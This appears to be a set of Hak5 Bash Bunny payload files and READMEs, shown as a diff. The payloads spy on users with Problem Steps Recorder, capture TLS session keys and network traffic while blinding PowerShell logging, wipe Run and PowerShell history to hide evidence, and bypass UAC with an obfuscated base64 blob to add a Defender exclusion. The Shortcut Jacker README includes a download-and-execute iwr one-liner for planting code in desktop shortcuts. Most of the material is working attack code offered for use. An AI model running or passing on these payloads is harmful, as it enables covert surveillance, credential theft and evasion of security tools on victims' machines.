# Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
|
||||
#
|
||||
(C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
|
||||
Start-Sleep -Seconds $RECORDER_TIME
|
||||
(C:\Windows\System32\psr.exe /stop) | Out-Null
|
||||
|
||||
}
|
||||
|
||||
"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
|
||||
|
||||
# Writes the file system cache to disk.
|
||||
#
|
||||
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
|
||||
|
||||
# Safely eject.
|
||||
#
|
||||
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
|
|
@ -0,0 +1,91 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Win_ProblemStepsRecorder
|
||||
#
|
||||
# Description:
|
||||
# Abuse of "Windows Problem Steps Recorder"
|
||||
# to spy on a user's activities.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Since Microsoft Windows 7 and 2008 R2
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# NOTE
|
||||
# ===============
|
||||
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Cyan inverted single blink ...................... SPECIAL
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly RECORDER_TIME=300
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "CD \"\${BB_SWITCH}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED SPECIAL
|
||||
|
||||
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
rm /root/udisk/loot/done.txt
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
@ -0,0 +1,63 @@
|
|||
# "Microsoft Windows" SSLKEYLOG
|
||||
|
||||
- Title: Win_SSLKeyLog
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows
|
||||
- Category: Credentials
|
||||
|
||||
## Description
|
||||
|
||||
>
|
||||
> Captures the client network session.
|
||||
>
|
||||
> Captures the client side session keys.
|
||||
>
|
||||
|
||||
1) Partially avoids "PowerShell Script Block Logging".
|
||||
2) Closing of all windows.
|
||||
3) Hide "PowerShell" window.
|
||||
4) Check if current process have "Administrator" privilege.
|
||||
5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
||||
6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
||||
7) Writes the file system cache to disk.
|
||||
8) Safely eject.
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly SNIFFING_TIME=300
|
||||
|
||||
|
||||
```
|
||||
|
||||
## Required
|
||||
|
||||
Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
|
||||
[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng)
|
||||
|
||||
Wireshark network protocol analyzer.
|
||||
[WIRESHARK](https://www.wireshark.org/)
|
||||
|
||||
## Steps
|
||||
|
||||
Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng".
|
||||
```
|
||||
.\etl2pcapng.exe .\capture.etl .\capture.pcapng
|
||||
```
|
||||
|
||||
Open your "capture.pcapng" with "Wireshark".
|
||||
|
||||
Configure "Wireshark" for HTTPS decryption.
|
||||
```
|
||||
Edit - Preferences
|
||||
Protocols - (SSL and/or TLS)
|
||||
(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt
|
||||
```
|
||||
|
||||
Happy hunting.
|
|
@ -0,0 +1,58 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
Param (
|
||||
[String] $BB_VOLUME,
|
||||
[Int] $SNIFFING_TIME
|
||||
)
|
||||
|
||||
# Partially avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Closing of all windows.
|
||||
#
|
||||
Get-Process -Name "explorer" | Stop-Process
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
# Check if current process have "Administrator" privilege.
|
||||
#
|
||||
If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
|
||||
|
||||
$bb_loot = "${BB_VOLUME}loot\"
|
||||
|
||||
# Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
||||
#
|
||||
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
|
||||
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
|
||||
|
||||
# Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
||||
#
|
||||
(NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
|
||||
Start-Sleep -Seconds $SNIFFING_TIME
|
||||
(NETSH trace stop) | Out-Null
|
||||
|
||||
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
|
||||
|
||||
}
|
||||
|
||||
"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
|
||||
|
||||
# Writes the file system cache to disk (thanks to @dark_pyrro).
|
||||
#
|
||||
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
|
||||
|
||||
# Safely eject (thanks to @Night (9o3)).
|
||||
#
|
||||
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
|
|
@ -0,0 +1,108 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Win_SSLKeyLog
|
||||
#
|
||||
# Description:
|
||||
# Captures the client network session.
|
||||
# Captures the client side session keys.
|
||||
#
|
||||
# 1) Partially avoids "PowerShell Script Block Logging".
|
||||
# 2) Closing of all windows.
|
||||
# 3) Hide "PowerShell" window.
|
||||
# 4) Check if current process have "Administrator" privilege.
|
||||
# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
||||
# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
||||
# 7) Writes the file system cache to disk (thanks to @dark_pyrro).
|
||||
# 8) Safely eject (thanks to @Night (9o3)).
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Microsoft Windows 10
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ===============
|
||||
# The target user must belong to the 'Administrator' group.
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Cyan inverted single blink ...................... SPECIAL
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly SNIFFING_TIME=300
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 5000
|
||||
Q GUI r
|
||||
Q DELAY 5000
|
||||
Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 1500
|
||||
Q CTRL-SHIFT ENTER
|
||||
Q DELAY 5000
|
||||
Q LEFTARROW
|
||||
Q DELAY 3000
|
||||
Q ENTER
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "CD \"\${BB_SWITCH}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED SPECIAL
|
||||
|
||||
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
rm /root/udisk/loot/done.txt
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
@ -0,0 +1,89 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.NOTES
|
||||
This script requires you to have a DropBox account or another file hosting service
|
||||
|
||||
.DESCRIPTION
|
||||
This program downloads a sound from your DropBox
|
||||
Turns the volume to max level on victims PC
|
||||
Pauses the script until a mouse movement is detected
|
||||
Then plays the sound with nothing popping up catching your victim off guard
|
||||
Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
|
||||
|
||||
#>
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
|
||||
iwr https:// <Your DropBox shared link intended for file> ?dl=1 -O $env:TMP\e.wav
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
# This turns the volume up to max level
|
||||
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
# This while loop will constantly check if the mouse has been moved
|
||||
# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
|
||||
# it will then sleep for the indicated number of seconds and check again
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
############################################################################################################################################################
|
||||
|
||||
# Play Sound
|
||||
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
|
@ -0,0 +1,99 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Play-WAV
|
||||
|
||||
A script used to download a WAV file and play it after a mouse movement is detected
|
||||
|
||||
## Description
|
||||
|
||||
This program starts off by using an Invoke-WebRequest to download a WAV file
|
||||
The system volume is then turned up to the max level
|
||||
Then the script will be paused until a mouse movement is detected
|
||||
After one is the WAV file will be played
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Play-WAV)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,26 @@
|
|||
# Title: Play-WAV
|
||||
# Description: This payload will download a WAV file, pause until a mouse movement is detected then play the sound effect
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Play-WAV.ps1')"
|
||||
QUACK ENTER
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,97 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Safe Haven
|
||||
|
||||
A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
|
||||
|
||||
## Description
|
||||
|
||||
This is a UAC bypass payload that will open an elevated powershell console
|
||||
|
||||
Next a Directory called "safe" will be generated in your Documents Directory
|
||||
|
||||
The "safe" directory will be added to the Window's Defender Exclusion list
|
||||
|
||||
The AntiVirus will ignore all files downloaded to or ran from here
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* A keystroke injection based payload will run
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-SafeHaven)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,23 @@
|
|||
REM Title: Safe-Haven
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console
|
||||
REM Next a Directory called "safe" will be generated in your Documents Directory
|
||||
REM The "safe" directory will be added to the Window's Defender Exclusion list
|
||||
REM The AntiVirus will ignore all files downloaded to or ran from here
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} );exit
|
||||
ENTER
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,21 @@
|
|||
REM Title: UrAttaControl
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
|
||||
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
LED STAGE1
|
||||
QUACK ${SWITCH_POSITION}/SafeHaven.txt
|
||||
|
|
@ -0,0 +1,144 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Shortcut+Jacker!+😈¢er=true&size=30">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Shortcut Jacker
|
||||
|
||||
<p align="left">
|
||||
<a href="https://www.youtube.com/watch?v=sOLIdqpzrW4">
|
||||
<img src=https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/SCJ-TV2.png width="300" alt="Python" />
|
||||
</a>
|
||||
<br>YouTube Tutorial
|
||||
</p>
|
||||
|
||||
A script used to embed malware in the shortcut on your targets desktop
|
||||
|
||||
## Description
|
||||
|
||||
This payload will run a powershell script in the background of any shortcut used on the targets desktop
|
||||
|
||||
This is done by taking advantage of the ```Target``` field where powershell commands can be stored or run.
|
||||
|
||||
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run.
|
||||
|
||||
So if your command exceeds that consider using an IWR function to download and execute a longer script.
|
||||
|
||||
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300">
|
||||
|
||||
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/code.jpg" width="900">
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Using the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field.
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/shortcut.jpg" width="900">
|
||||
|
||||
## Getting Started
|
||||
|
||||
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file
|
||||
|
||||
### Dependencies
|
||||
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
